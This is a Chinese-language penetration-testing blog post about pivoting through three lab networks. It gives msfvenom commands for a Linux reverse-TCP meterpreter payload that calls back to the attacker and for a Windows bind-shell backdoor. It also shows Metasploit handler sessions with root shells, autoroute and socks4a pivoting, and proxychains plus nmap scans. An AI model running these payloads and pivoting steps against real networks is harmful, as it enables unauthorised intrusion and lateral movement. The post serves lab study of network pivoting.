多层网络下的内网穿透

September 11, 2020 WEB渗透测试 访问: 74 次

环境准备

攻击机:kali
靶机:
第一层:ubuntu-16  开放apache服务
第二层:windows-10  开放python-http服务
第三层:ubuntu-18   开放python-http服务

网络拓扑结构:
wNJS1J.png

第一层靶机

通过msfvenom生成shell.elf

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.37.129.4 LPORT=10001 -f elf > shell.elf

通过msf来接收shell

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.37.129.4
lhost => 10.37.129.4
msf5 exploit(multi/handler) > set lport 10001
lport => 10001
msf5 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on 10.37.129.4:10001 
[*] Sending stage (3021284 bytes) to 10.37.129.3
[*] Meterpreter session 1 opened (10.37.129.4:10001 -> 10.37.129.3:51818) at 2020-09-11 11:59:42 +0800

meterpreter > shell
Process 5755 created.
Channel 1 created.
whoami
root
exit
meterpreter > ipconfig

Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 65536
Flags        : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::


Interface  2
============
Name         : enp0s5
Hardware MAC : 00:1c:42:bf:dc:a6
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 10.37.129.3
IPv4 Netmask : 255.255.255.0
IPv6 Address : fdb2:2c26:f4e4:1:acba:39b0:bd5c:a5de
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fe80::593f:cc6d:4234:e5e6
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface  3
============
Name         : enp0s6
Hardware MAC : 00:1c:42:dd:88:60
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 10.37.132.4
IPv4 Netmask : 255.255.255.0
IPv6 Address : fdb2:2c26:f4e4:2:2126:9877:d1c1:6a6d
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fe80::f69e:4ffb:a6c2:77cd
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fdb2:2c26:f4e4:2:e68c:2f44:d7a9:162a
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface  4
============
Name         : docker0
Hardware MAC : 02:42:35:29:f2:ef
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 172.17.0.1
IPv4 Netmask : 255.255.0.0

meterpreter >

发现第二层网络10.37.132.4

我们通过msf添加路由

meterpreter > run autoroute -s 10.37.132.0/24

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.37.132.0/255.255.255.0...
[+] Added route to 10.37.132.0/255.255.255.0 via 10.37.129.3
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.37.132.0        255.255.255.0      Session 1

meterpreter >

然后通过background返回到msf的上一级,利用use auxiliary/scanner/portscan/tcp来扫描第二层网络中80端口开启的主机

msf5 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.37.132.1/24
RHOSTS => 10.37.132.1/24
msf5 auxiliary(scanner/portscan/tcp) > set ports 80
ports => 80
msf5 auxiliary(scanner/portscan/tcp) > run

[+] 10.37.132.4:          - 10.37.132.4:80 - TCP OPEN
[+] 10.37.132.5:          - 10.37.132.5:80 - TCP OPEN
[*] 10.37.132.1/24:       - Scanned  26 of 256 hosts (10% complete)
[*] 10.37.132.1/24:       - Scanned  52 of 256 hosts (20% complete)
[*] 10.37.132.1/24:       - Scanned  77 of 256 hosts (30% complete)
[*] 10.37.132.1/24:       - Scanned 103 of 256 hosts (40% complete)

可以发现10.37.132.5存活,利用msf搭建socks4a代理

msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) > set SRVPORT 9999
SRVPORT => 9999
msf5 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/socks4a) > 
[*] Starting the socks4a proxy server

msf5 auxiliary(server/socks4a) > show options 

Module options (auxiliary/server/socks4a):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The address to listen on
   SRVPORT  9999             yes       The port to listen on.


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  


msf5 auxiliary(server/socks4a) > 

在kali的浏览器中搭建代理,127.0.0.1:9000,即可通过浏览器访问到第二层主机10.37.132.5开放的服务

利用proxychains扩大利用手法,配置/etc/proxychains.conf

dynamic_chain
ocks4          127.0.0.1 9999
值得注意的地方就是,proxychains不支持udpcmp协议

proxychains+nmap扫描

proxychains nmap -sT -Pn  10.37.132.5
Nmap scan report for windows10.host-only--2 (10.37.132.5)
Host is up (0.0020s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE
80/tcp  open  http
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 23.29 seconds

连接第二层的靶机我们需要正向连接,第二层的靶机无法直接访问到我们的攻击机

生成windows后门文件

msfvenom -p windows/meterpreter/bind_tcp  LPORT=6668 -f exe > shell_3.exe

msf连接:

msf5 auxiliary(scanner/portscan/tcp) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set rhost 10.37.132.5
rhost => 10.37.132.5
msf5 exploit(multi/handler) > set lport 6668
lport => 6668
msf5 exploit(multi/handler) > exploit -j
[*] Started bind TCP handler against 10.37.132.5:6668
[*] Sending stage (180291 bytes) to 10.37.132.5
[*] 10.37.132.5 - Meterpreter session 3 closed.  Reason: Died
[*] Meterpreter session 3 opened (10.37.129.4-10.37.129.3:0 -> 10.37.132.5:6668) at 2020-09-11 17:29:25 +0800
msf5 exploit(multi/handler) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                                 Connection
  --  ----  ----                     -----------                                 ----------
  2         meterpreter x64/linux    uid=0, gid=0, euid=0, egid=0 @ 10.37.129.3  10.37.129.4:10001 -> 10.37.129.3:53086 (10.37.129.3)
  4         meterpreter x86/windows  F449\radish @ F449                          10.37.129.4-10.37.129.3:0 -> 10.37.132.5:6668 (10.37.132.5)

msf5 exploit(multi/handler) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > background 
[*] Backgrounding session 4...
msf5 exploit(multi/handler) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > ls

在第二层的session中设置路由

meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.37.132.0        255.255.255.0      Session 2

meterpreter > run autoroute -s 10.37.133.0/24

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.37.133.0/255.255.255.0...
[-] Could not execute autoroute: ArgumentError Invalid :session, expected Session object got Msf::Sessions::Meterpreter_x86_Win
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.37.132.0        255.255.255.0      Session 2
   10.37.133.0        255.255.255.0      Session 4

meterpreter > 

不知道为什么会报错,但是浏览器代理是可以访问到第三层的机器

添加新评论